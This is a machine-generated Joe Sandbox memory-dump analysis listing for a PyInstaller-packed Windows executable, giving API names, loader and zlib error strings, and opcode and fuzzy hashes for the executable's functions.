                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction ID: b1430b918680b9ee3500619412563b125569eb84f740ef50d30eb529adeea469
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB2F872A182928BEB25CF68D84A7FD37A1FB64798F405135DA0D97A84DFBCE500CB41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                                              • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                              • Instruction ID: 319f4cf9aab1d11b8fee948e4f36158f9372da558f9970dbbdb0976506d608d7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3052F672A186A64BDBA48F15C858B7D3BADFB44350F014139EA4AC7780DF3ED884CB45
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                              • Instruction ID: 6d47eba98126159dd247e6d7a1b8a5d06b750ec52ceeca0887f59b8091e264d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9061F962F0C25286FF648A7D9C5A67D6680EF60770F154239EA1DC3AC5DEBEE801C702
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction ID: 8ea92525a263b1db0908177b6252147d1c6a62b15f60fb5f873dcf555c2ab54b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F41A462C0D74F05EDA9891C0D0D6B46B809F22BB0D5852B5DDDD973D3CD0DA9A7C306
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction ID: 85065961ca6842084c6a6e89fa5094fa95e95bfc959d812abd0e139f74d10c82
• Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction Fuzzy Hash: 6B41F372714A9582EF04CF2ADD29569B3A1FB48FE0B499036EE0DD7B58DE3DD0528301
APIs
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5840
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5852
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5889
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F589B
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58B4
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58C6
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58DF
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58F1
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F590D
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F591F
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F593B
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F594D
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5969
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F597B
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5997
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59A9
• GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59C5
• GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59D7
Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 6619931e63b14310192cb118969e6357bb73a3435b4290c8dd8125c1c6dcdb6d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3022DA6490DF0B99FE15CB5DBC6A5B823B0AF247B5F541035C81E82260FFBDB189924B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62C0F86B7,?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction ID: c4a4301164b462cb6397726c5f45bbea8ec773880fba7c5bfdc6f11441fe4b33
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951F610A2DA4288FF51EB28EC562FE2361AF957A0F544431DE0EC26D5EFBDF045834A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 46fc1f4ccb1474852cc9f4fe89bbc49f8b1fa66c052088270278482ea0f44b78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E876604BA186DA349F2AF8181BAB7A1F798B61F004125EFDF83694DF7CD085DB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 58c842badf6d958e47ae5fd5c628e2b6cd9f2abeeaf88c6d44f8f795cbda9130
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1219161B09A8286EF458B7EBC491796254FF99FB0F584331DE2EC3394DF6CD590820A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: a59d2eb9e0c1bfefa1bdff49e8a6065b577ecdf93e17dd52da3a8f57425589c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE129471E0C26386FF205B14D95E67976A2FB50770F844136EE8987AC4DF3CE9A08B16
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62C0F351A,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F2AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B30D
